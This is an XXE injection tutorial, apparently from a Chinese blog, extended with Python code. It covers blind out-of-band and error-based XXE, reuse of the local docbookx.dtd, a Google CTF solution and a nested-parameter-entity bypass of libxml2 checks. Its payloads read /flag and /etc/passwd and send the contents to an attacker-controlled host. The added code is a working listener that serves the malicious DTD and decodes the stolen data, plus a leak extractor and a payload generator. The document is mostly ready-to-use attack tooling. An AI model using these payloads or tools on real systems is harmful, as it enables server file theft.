XXE injection

0x01 Source

Blind XXE in detail, with a Google CTF challenge

0x02 Common payloads

I. Blind XXE

1. External DTD

(1) Put the following DTD file on your server:

xml.dtd

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>">
%start;

(2) Then send the following request. The php://filter wrapper base64-encodes the file, so newlines and special characters in it cannot break the URL or the entity declaration it is embedded in:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://myip/xml.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    %remote;
    %send;
]>
<message>1234</message>
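An attacker-side harness for the flow just shown, added here as an example and not code from the original post: one Python listener that both serves xml.dtd and decodes the base64 that arrives in the callback query string. It assumes the target reaches us at http://myip:10001/ (substitute the real address) and that the payload's remote entity points at http://myip:10001/xml.dtd rather than the port-80 URL used in the request above, since everything is served from a single port:

```python
import base64
import binascii
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# Assumption: this is how the target reaches us. The page uses myip:10001
# for the callback; we serve xml.dtd from the same listener, so the
# payload's remote entity should point at http://myip:10001/xml.dtd.
CALLBACK = "http://myip:10001/"
PORT = 10001


def build_dtd(callback: str) -> str:
    """The external DTD from the page, with the callback URL filled in.

    %file; is a plain reference, so it is expanded when this DTD is parsed,
    putting the (base64) file contents into the URL of 'send'. &#x25; is a
    character reference: it only becomes a literal '%' once the outer
    literal has been read, so the inner declaration is well-formed and
    %send; performs the fetch.
    """
    return (
        f"<!ENTITY % start \"<!ENTITY &#x25; send SYSTEM '{callback}?%file;'>\">\n"
        "%start;\n"
    )


def decode_exfil(request_path: str) -> bytes:
    """Recover the file from a callback path of the form '/?<base64>'.

    The target used php://filter/read=convert.base64-encode, so the query
    is base64 without newlines. The raw query is used (no '+' to space
    conversion) and '=' padding is restored, since the payload has no
    control over whether trailing '=' survive the trip.
    """
    raw = unquote(urlsplit(request_path).query)
    padded = raw + "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except binascii.Error:
        return raw.encode()  # not base64 (e.g. raw file without the filter)


class Handler(BaseHTTPRequestHandler):
    captured = []  # every decoded exfiltration, in arrival order

    def do_GET(self):
        if self.path.startswith("/xml.dtd"):
            body = build_dtd(CALLBACK).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_exfil(self.path)
        Handler.captured.append(data)
        print(f"[+] {self.client_address[0]} leaked {len(data)} bytes:")
        print(data.decode(errors="replace"))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stdout for the leaked data only


def serve(port: int = PORT) -> HTTPServer:
    """Start the listener in a background thread and return the server."""
    srv = HTTPServer(("0.0.0.0", port), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    server = serve()
    print(f"[*] serving /xml.dtd and awaiting callbacks on :{PORT}")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
```

Run it, send the request, and the decoded file is printed; Handler.captured keeps every hit for later inspection. Because the whole file travels inside one URL, a large file can exceed URL length limits on either side, which is the usual reason an exfiltration arrives truncated.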

2. Local DTD file

Ubuntu ships /usr/share/yelp/dtd/docbookx.dtd, which declares a parameter entity named ISOamso and then references it. Because the first declaration of an entity wins, declaring ISOamso ourselves in the internal subset means the %ISOamso; reference inside docbookx.dtd expands our declarations instead, from an external-subset context where nested parameter-entity references are permitted:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    <!ENTITY % ISOamso '
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; send SYSTEM &#x27;http://myip/?&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;send;
    '> 
    %remote;
]>
<message>1234</message>

II. Error-based Blind XXE

The principle is the same as OOB. With OOB, the data is carried out of band in a URL that the parser fetches; with error-based, the URL is deliberately broken (it points at a path that does not exist), so the file contents come back inside the parser's error message instead.
The construction is therefore almost identical to the OOB one; only the URL differs.

1. Via a DTD on your server

xml.dtd

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'file:///hhhhhhh/%file;'>">
%start;

Request (the directory hhhhhhh does not exist, so loading the send entity fails and the error names the full URL, base64 contents included):

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://blog.szfszf.top/xml.dtd">
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    %remote;
    %send;
]>
<message>1234</message>

2. Via a local DTD file

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    <!ENTITY % ISOamso '
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; send SYSTEM &#x27;file://hhhhhhhh/?&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;send;
    '> 
    %remote;
]>
<message>1234</message>
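Pulling the leak out of the response, as an added example that is not part of the original post. The two sample responses are constructed for this example; their message shapes are libxml2's as surfaced through PHP warnings: "failed to load external entity" when the %send; reference is followed and the path cannot be opened, and "Invalid URI:" when the declared system literal itself is not a valid URI, which is what a raw (non-base64) target such as the flag in the Google CTF payloads can produce at declaration time, without the entity ever being referenced:

```python
import base64
import binascii
import html
import re

# Constructed sample responses (not captured from any real target): PHP's
# HTML-escaped warning output wrapping libxml2's two relevant messages.
SAMPLE_IO_WARNING = (
    "<br />\n<b>Warning</b>:  simplexml_load_string(): I/O warning : failed to "
    "load external entity &quot;file:///hhhhhhh/ZmxhZ3t0ZXN0fQ==&quot; in "
    "/var/www/html/index.php on line 12<br />\n"
)
SAMPLE_INVALID_URI = (
    "<br />\n<b>Warning</b>:  simplexml_load_string(): Invalid URI: "
    "file:///flag{test} in /var/www/html/index.php on line 12<br />\n"
)

# Variant 1: the %send; reference is followed and the open fails, so the
# full URI is quoted back. Variant 2: the system literal is rejected as a
# URI when the entity is declared (e.g. it contains '{' or whitespace), so
# the literal is echoed without the entity being referenced at all.
LEAK_PATTERNS = (
    re.compile(r'failed to load external entity "(?P<uri>[^"]+)"'),
    re.compile(r"Invalid URI: (?P<uri>\S+)"),
)


def extract_leak(response: str, sink: str = "file:///hhhhhhh/", encoded: bool = True):
    """Return the leaked file bytes, or None if no leak is present.

    `sink` is the prefix the payload put in front of the data (the post
    uses file:///hhhhhhh/ with base64, and bare file:/// for the raw flag).
    With encoded=True the remainder is base64 from php://filter; padding
    is restored in case the parser or the error formatter dropped it.
    """
    text = html.unescape(response)
    for pat in LEAK_PATTERNS:
        m = pat.search(text)
        if not m:
            continue
        uri = m.group("uri")
        data = uri[len(sink):] if uri.startswith(sink) else uri
        if not encoded:
            return data.encode()
        padded = data + "=" * (-len(data) % 4)
        try:
            return base64.b64decode(padded, validate=True)
        except binascii.Error:
            return data.encode()  # not base64 after all: hand back the raw text
    return None


if __name__ == "__main__":
    print(extract_leak(SAMPLE_IO_WARNING))
    print(extract_leak(SAMPLE_INVALID_URI, sink="file:///", encoded=False))
```

The "Invalid URI" pattern stops at the first whitespace, so a raw file containing spaces or newlines will only come back in part; that is exactly why the base64 filter variant is preferred whenever the target runs PHP.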

0x03 Google CTF

Challenge address

First, intercept the request with Burp Suite.

The web application is JSON-based, but the endpoint also accepts XML, so we change the JSON body to XML and send the payload:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ELEMENT message ANY>
    <!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % para1 SYSTEM "file:///flag">
    <!ENTITY % ISOamso '
        <!ENTITY &#x25; para2 "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;para1;&#x27;>">
        &#x25;para2;
    '>
    %remote;
]>
<message>10</message>

But I found that the challenge can also be solved without referencing any external DTD file at all, by nesting the parameter entities directly:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ELEMENT message ANY>
    <!ENTITY % para1 SYSTEM "file:///flag">
    <!ENTITY % para '
        <!ENTITY &#x25; para2 "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;para1;&#x27;>">
        &#x25;para2;
    '>
    %para;
]>
<message>10</message>

0x04 An interesting discovery

I found that although the W3C specification forbids parameter-entity references inside entity declarations in the internal subset, many XML parsers do not enforce this check thoroughly. Almost every XML parser detects the following two-level nesting:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % file SYSTEM "file:///etc/passwd">  
    <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip/?%file;'>">
    %start;
    %send;
]>
<message>10</message>

But with a payload built from three nested parameter entities, some XML parsers fail to detect it. For example, the two combinations I tested, PHP 7.2 + libxml2 2.9.4 and PHP 5.4 + libxml2 2.9.1, can both be exploited:

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ELEMENT message ANY>
    <!ENTITY % para1 SYSTEM "file:///flag">
    <!ENTITY % para '
        <!ENTITY &#x25; para2 "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;para1;&#x27;>">
        &#x25;para2;
    '>
    %para;
]>
<message>10</message>

This means Blind XXE can be achieved without referencing any external DTD at all.
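The escaping rule behind the local-DTD payload in 0x02 and the three-level payload above, as an added example and not the author's code. It spells out what the hand-written payloads do by hand: a '%' or quote that must only take effect after N rounds of entity-literal parsing is wrapped in N character references (%, &#x25;, &#x26;#x25;, ...), and each round of parsing peels one layer off. Entity names (para, para1, para2, error, remote, ISOamso), the docbookx.dtd path and the sink prefixes come from the post; the flag value used in the simulation is constructed for this example:

```python
import re

# One character reference, hex or decimal; resolving it once is one "round"
# of entity-literal processing.
CHAR_REF = re.compile(r"&#(x[0-9A-Fa-f]+|[0-9]+);")


def char_ref(ch: str, depth: int) -> str:
    """Write `ch` so that it becomes itself only after `depth` rounds of
    literal parsing: depth 0 -> ch, 1 -> &#xNN;, 2 -> &#x26;#xNN;, ..."""
    if depth == 0:
        return ch
    return "&" + "#x26;" * (depth - 1) + f"#x{ord(ch):x};"


def pe_ref(name: str, depth: int) -> str:
    """Parameter-entity reference %name; written for literal depth `depth`."""
    return char_ref("%", depth) + f"{name};"


def _ref_to_char(m) -> str:
    ref = m.group(1)
    return chr(int(ref[1:], 16)) if ref[0] == "x" else chr(int(ref))


def decode_layer(text: str) -> str:
    """One round of literal processing: resolve every character reference
    once, leaving whatever that produced (e.g. a fresh &#x25;) for the next
    round. This mirrors how the parser reads an EntityValue."""
    return CHAR_REF.sub(_ref_to_char, text)


def wrapper_literal(sink: str) -> str:
    """Replacement text of the wrapper entity (para in 0x04, ISOamso in the
    local-DTD variant). It is written one level deep because the parser
    reads the wrapper's literal once before this text is seen: the para2
    declaration needs its '%' at depth 1, the error declaration nested in
    para2's literal needs its '%' at depth 2, and the quotes around the
    SYSTEM literal must not terminate the wrapper's own quotes."""
    q = char_ref("'", 1)
    error_decl = (
        f"<!ENTITY {char_ref('%', 2)} error SYSTEM "
        f"{q}{sink}{pe_ref('para1', 1)}{q}>"
    )
    return (
        f"\n        <!ENTITY {char_ref('%', 1)} para2 \"{error_decl}\">"
        f"\n        {pe_ref('para2', 1)}\n    "
    )


def three_level_payload(target: str = "file:///flag", sink: str = "file:///",
                        local_dtd: str = None) -> str:
    """local_dtd=None: the internal-subset-only payload from 0x04.
    local_dtd set (e.g. /usr/share/yelp/dtd/docbookx.dtd): the 0x02 variant
    that predefines ISOamso so the DTD's own %ISOamso; reference expands
    our declarations instead of its entity file."""
    wrapper = "ISOamso" if local_dtd else "para"
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE message [", "    <!ELEMENT message ANY>"]
    if local_dtd:
        lines.append(f'    <!ENTITY % remote SYSTEM "{local_dtd}">')
    lines.append(f'    <!ENTITY % para1 SYSTEM "{target}">')
    lines.append(f"    <!ENTITY % {wrapper} '{wrapper_literal(sink)}'>")
    lines.append("    %remote;" if local_dtd else f"    %{wrapper};")
    lines += ["]>", "<message>10</message>"]
    return "\n".join(lines) + "\n"


def two_level_payload(target: str = "file:///etc/passwd",
                      callback: str = "http://myip/?") -> str:
    """The two-level form from 0x04: %file; is referenced from a literal the
    parser reads directly in the internal subset, which almost every parser
    rejects."""
    send_decl = f"<!ENTITY {char_ref('%', 1)} send SYSTEM '{callback}{pe_ref('file', 0)}'>"
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE message [\n"
        f'    <!ENTITY % file SYSTEM "{target}">\n'
        f'    <!ENTITY % start "{send_decl}">\n'
        "    %start;\n"
        "    %send;\n"
        "]>\n"
        "<message>10</message>\n"
    )


def simulate(literal: str, file_contents: str) -> list:
    """Walk a wrapper literal through successive rounds, substituting the
    constructed file contents where %para1; is referenced. The whole text
    is decoded each round, so read the innermost declaration at each step:
    round 1 is what %para; yields, round 2 what %para2; yields."""
    rounds = [literal]
    cur = literal
    for _ in range(8):  # bound; real payloads need two or three rounds
        if not (CHAR_REF.search(cur) or "%para1;" in cur):
            break
        cur = decode_layer(cur).replace("%para1;", file_contents)
        rounds.append(cur)
    return rounds


if __name__ == "__main__":
    print(three_level_payload())
    for i, step in enumerate(simulate(wrapper_literal("file:///"), "flag{test}")):
        print(f"--- round {i} ---{step}")
```

The simulation makes the page's observation concrete: in the two-level form the %file; reference is met while the parser is still reading the internal subset itself, whereas in the three-level form the forbidden reference (%para1;) only appears after a parameter-entity expansion, which is where the tested libxml2 builds stop checking.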


Source: blog.csdn.net/a3320315/article/details/102789157